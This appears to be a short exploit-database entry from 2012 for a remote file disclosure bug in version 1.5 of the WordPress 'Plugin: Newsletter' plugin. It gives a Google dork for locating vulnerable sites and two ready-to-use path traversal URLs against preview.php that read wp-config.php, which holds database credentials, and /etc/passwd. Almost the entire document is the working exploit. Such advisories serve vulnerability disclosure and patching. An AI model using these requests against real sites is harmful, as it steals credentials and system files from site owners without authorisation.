id: 18489
date: 06/07/2012
title: Wordpress Plugins - Plugin: Newsletter Remote File Disclosure Vulnerability
author: Sammy FORGIT
cves: 

##################################################
# Description : Wordpress Plugins - Plugin: Newsletter Remote File Disclosure Vulnerability
# Version : 1.5
# Link : http://wordpress.org/extend/plugins/plugin-newsletter/
# Plugins : http://downloads.wordpress.org/plugin/plugin-newsletter.zip
# Google Dork : inurl:/wp-content/plugins/plugin-newsletter/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php

Read source [CTRL-u]

http://www.exemple.com/wordpress/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../../../../../etc/passwd

Read source [CTRL-u]



#  0day.today [2023-03-26]  #